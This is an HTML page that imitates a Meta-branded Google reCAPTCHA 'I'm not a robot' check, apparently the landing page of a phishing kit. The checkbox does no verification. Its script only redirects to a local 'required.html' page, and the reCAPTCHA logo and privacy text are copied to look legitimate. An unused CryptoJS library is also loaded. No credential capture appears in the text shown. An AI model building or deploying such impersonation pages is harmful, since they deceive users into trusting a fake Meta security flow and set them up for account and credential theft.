<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Security Check - Meta</title>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tailwindcss@3.4.1/dist/tailwind.min.css">
    <link rel="stylesheet" href="./public/styles/checkbox.css">
    <link rel="stylesheet" href="./public/styles/style.css">
    <!-- Tailwind CSS CDN -->
    <script src="https://cdn.tailwindcss.com"></script>
    <script>
        tailwind.config = {
            theme: {
                extend: {
                    colors: {
                        primary: '#5D87FF',
                        secondary: '#212121'
                    }
                }
            }
        }
    </script>

    <!-- CryptoJS for encryption -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.2.0/crypto-js.min.js"></script>
</head>

<body class="bg-[#ffffff] flex flex-col items-center justify-center h-[100vh] w-full">
    <div class="font-sans text-sm text-gray-800 w-full h-full flex flex-col justify-center p-4 md:p-0 md:w-[300px]">
        <div class="w-full">
            <img src="./public/logo-meta.svg" alt="Meta" class="w-[64px]">
        </div>

        <div class="flex items-center justify-start bg-cover bg-center py-5 w-full">
            <div
                class="bg-[#f9f9f9] border-2 rounded-md text-[#4c4a4b] flex flex-row items-center justify-between pr-2 w-full">
                <div class="flex flex-row items-center justify-start ml-4">
                    <div class="relative w-[30px] h-[30px] flex items-center justify-center">
                        <label class="checkbox flex items-center justify-center cursor-pointer">
                            <input type="checkbox" id="robotCheckbox">
                            <svg viewBox="0 0 21 21">
                                <path
                                    d="M5,10.75 L8.5,14.25 L19.4,2.3 C18.8333333,1.43333333 18.0333333,1 17,1 L4,1 C2.35,1 1,2.35 1,4 L1,17 C1,18.65 2.35,20 4,20 L17,20 C18.65,20 20,18.65 20,17 L20,7.99769186">
                                </path>
                            </svg>
                        </label>
                    </div>
                    <label for="robotCheckbox" class="cursor-pointer text-sm text-gray-500 font-semibold mr-4 ml-1">
                        I'm not a robot
                    </label>
                </div>
                <div class="flex items-center flex-col text-[#9d9ba7] mb-[2px]">
                    <img src="./public/recaptcha.png" alt="reCAPTCHA" class="w-[40px] h-[40px] mt-[.5rem]">
                    <span class="text-[10px] font-bold">reCAPTCHA</span>
                    <div class="text-[8px]">Privacy - Terms</div>
                </div>
            </div>
        </div>

        <div class="text-gray-700 text-[13px] leading-[1.3]">
            <p class="font-normal">
                This helps us to combat harmful conduct, detect and prevent spam and maintain the integrity of our Products.
            </p>
            <p class="font-normal mt-4">
                We’ve used Google's reCAPTCHA Enterprise product to provide this security check. Your use of reCAPTCHA Enterprise is subject to Google’s Privacy Policy and Terms of Use.
            </p>
            <p class="font-normal mt-4">
                reCAPTCHA Enterprise collects hardware and software information, such as device and application data, and sends it to Google to provide, maintain, and improve reCAPTCHA Enterprise and for general security purposes. This information is not used by Google for personalized advertising.
            </p>
        </div>
    </div>

    <script>
        const checkbox = document.getElementById('robotCheckbox');
        checkbox.addEventListener('change', () => {
            if (checkbox.checked) {
                setTimeout(() => {
                    window.location.href = './required.html';
                }, 600);
            }
        });
    </script>
</body>

</html>